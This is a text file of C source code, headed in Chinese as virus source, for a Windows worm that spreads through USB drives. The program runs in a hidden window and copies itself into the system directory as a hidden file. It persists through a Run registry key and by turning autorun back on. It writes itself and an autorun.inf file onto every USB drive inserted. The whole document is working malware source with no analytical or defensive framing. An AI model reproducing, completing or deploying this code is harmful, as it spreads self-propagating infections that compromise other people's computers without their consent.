cvirus.c.txt

c病毒源码

一个c病毒源代码 
#include <windows.h> 
#include <Shlwapi.h> 
#include <fstream.h> 
#include <TlHelp32.h> 
#include <Dbt.h> 

#pragma comment(lib,"shlwapi.lib") 

#define TIMER 1//计时器 

//function 
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程 
//获取盘符 
TCHAR FirstDriveFromMask (ULONG unitmask); 

//病毒从U盘启动时用到的函数 
BOOL FileExist(TCHAR *path);//测试一个文件是否存在 
BOOL GetSelfPath(TCHAR *path);//Get the virus's path 
//BOOL FindU(TCHAR *u);//check whether u exist, u[2] 
BOOL GetSysPath(TCHAR *path);//得到系统路径 
BOOL CopyToSysAndSet(HWND hwnd);//复制自身到系统目录和设置 
BOOL SetFileAttrib(TCHAR *path);//设置path所指文件的属性 
BOOL RegAutoRun(TCHAR *path);//修改注册表，实现自启动 

//从C盘启动时用到函数 
BOOL CopyToUAndSet();//复制自己到U盘 
BOOL CreateAutoRunFile(TCHAR *path);//在U盘下生成autorun.inf文件 
BOOL FindSelf();//测试自己是否在已经执行了 

//global variable 
TCHAR szExePath[MAX_PATH];//the virus's path 
TCHAR U[2];//保存U盘的盘符 
TCHAR szSysPath[MAX_PATH];//system path 

//constant 
const TCHAR *szExeName="bbbbb.exe"; 
const TCHAR *szSysName="aaaaa.exe"; 
const TCHAR *szAutoRunFile="AutoRun.inf"; 

int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, 
PSTR szCmdLine, int iCmdShow) 
{ 
static TCHAR szAppName[]=TEXT ("UUUUUU"); 
HWND hwnd; 
MSG msg; 
WNDCLASS wndclass; 

wndclass.style =0; 
wndclass.lpfnWndProc =WndProc; 
wndclass.cbClsExtra =0; 
wndclass.cbWndExtra =0; 
wndclass.hInstance =hInstance; 
wndclass.hIcon =0; 
wndclass.hCursor =0; 
wndclass.hbrBackground =0; 
wndclass.lpszMenuName =NULL; 
wndclass.lpszClassName =szAppName; 
if (!RegisterClass (&wndclass)) 
{ 
MessageBox (NULL,TEXT("Program requires Windows NT!"), 
szAppName, MB_ICONERROR); 
return 0; 
} 
hwnd = CreateWindow (szAppName, NULL, 
WS_DISABLED, 
0, 0, 
0, 0, 
NULL, NULL, hInstance, NULL); 
while (GetMessage(&msg, NULL, 0, 0)) 
{ 
TranslateMessage (&msg); 
DispatchMessage (&msg); 
} 
return msg.wParam; 
} 

LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam) 
{ 
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam; 
switch(wParam) 
{ 
case DBT_DEVICEARRIVAL: //插入 
if (lpdb -> dbch_devicetype == DBT_DEVTYP_VOLUME) 
{ 
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb; 
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盘盘符 
//MessageBox(0,U,"Notice!",MB_OK); 
CopyToUAndSet();//拷到u盘 
} 
break; 
case DBT_DEVICEREMOVECOMPLETE: //设备删除 
break; 
} 
return LRESULT(); 
} 

LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam) 
{ 
switch(message) 
{ 
case WM_Create: //处理一些要下面要用到的全局变量 
U[1]=':'; 
GetSysPath(szSysPath);//得到系统路径 
SetTimer(hwnd,TIMER,5000,0);//启动计时器 
GetSelfPath(szExePath);//得到自身的路径 
return 0; 
case WM_TIMER: //timer message 
if(szExePath[0]==szSysPath[0]) //如果是系统盘启动的 
SendMessage(hwnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息 
else 
{ 
CopyToSysAndSet(hwnd);//拷到系统盘并自启动 
} 
return 0; 
case WM_DEVICECHANGE: 
OnDeviceChange(hwnd,wParam,lParam); 
return 0; 
case WM_DESTROY: 
KillTimer(hwnd,TIMER); 
PostQuitMessage(0); 
return 0; 
} 
return DefWindowProc(hwnd, message, wParam, lParam); 
} 

TCHAR FirstDriveFromMask(ULONG unitmask) 
{ 
char i; 
for (i = 0; i < 26; ++i) 
{ 
if (unitmask & 0x1)//看该驱动器的状态是否发生了变化 
break; 
unitmask = unitmask >> 1; 
} 
return (i + 'A'); 
} 

BOOL GetSelfPath(TCHAR *path) 
{ 
if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录 
{ 
return TRUE; 
} 
else 
return FALSE; 
} 

BOOL GetSysPath(TCHAR *path) 
{ 
return GetSystemDirectory(path,MAX_PATH);//得到系统路径 
} 

BOOL CopyToSysAndSet(HWND hwnd) 
{ 
TCHAR szPath[MAX_PATH]; 
lstrcpy(szPath,szSysPath); 
lstrcat(szPath,"\\"); 
lstrcat(szPath,szSysName);//得到复制到系统目录的完整目录 
if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件 
{ 
CopyFile(szExePath,szPath,FALSE); 
RegAutoRun(szPath); 
return SetFileAttrib(szPath); 
} 
else 
{ 
if(!FindSelf())//检测自己有没有运行 
{ 
//MessageBox(0,szExePath,szPath,MB_OK); 
WinExec(szPath,SW_HIDE);//没有就执行 
SendMessage(hwnd,WM_CLOSE,0,0);//结束自己 
} 
} 
return FALSE; 
} 

BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在 
{ 
int result; 
result=PathFileExists(path); 
if(result==1) 
return TRUE; 
else 
return FALSE; 
} 

BOOL SetFileAttrib(TCHAR *path) 
{ 
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN); 
} 

BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动 
{ 
HKEY hkey; 
DWORD v=0; 
RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hkey); 
RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)&v,sizeof(DWORD)); 
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run", 
&hkey)==ERROR_SUCCESS) 
{ 
RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path)); 
RegCloseKey(hkey); 
return TRUE; 
} 
else 
return FALSE; 
} 
BOOL CopyToUAndSet() 
{ 
TCHAR szPath[MAX_PATH]; 
lstrcpy(szPath,U); 
lstrcat(szPath,"\\"); 
lstrcat(szPath,szExeName);//得到指向U盘的完整目录 

TCHAR szAutoFile[MAX_PATH]; 
lstrcpy(szAutoFile,U); 
lstrcat(szAutoFile,"\\"); 
lstrcat(szAutoFile,szAutoRunFile); 

if(!FileExist(szAutoFile)) 
{ 
CreateAutoRunFile(szAutoFile); 
SetFileAttrib(szAutoFile); 
} 
if(!FileExist(szPath)) 
{ 
CopyFile(szExePath,szPath,FALSE); 
return SetFileAttrib(szPath); 
} 
return FALSE; 
} 

BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件 
{ 
ofstream fout; 
fout.open(path); 
if(fout) 
{ 
fout<<"[AutoRun]"<<endl; 
fout<<"open="<<szExeName<<" e"<<endl; 
fout<<"shellexecute="<<szExeName<<" e"<<endl; 
fout<<"shell\\Auto\\command="<<szExeName<<" e"<<endl; 
fout<<"shell=Auto"<<endl; 
fout.close(); 
return TRUE; 
} 
return FALSE; 
} 

BOOL FindSelf(){ 
PROCESSENTRY32 pe; 
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 
pe.dwSize=sizeof(PROCESSENTRY32); 
if(Process32First(hShot,&pe)){ 
do{ 
if(lstrcmp(pe.szExeFile,szSysName)==0) 
{ 
CloseHandle(hShot); 
return TRUE; 
} 
}while(Process32Next(hShot,&pe)); 
} 
CloseHandle(hShot); 
return FALSE; 
}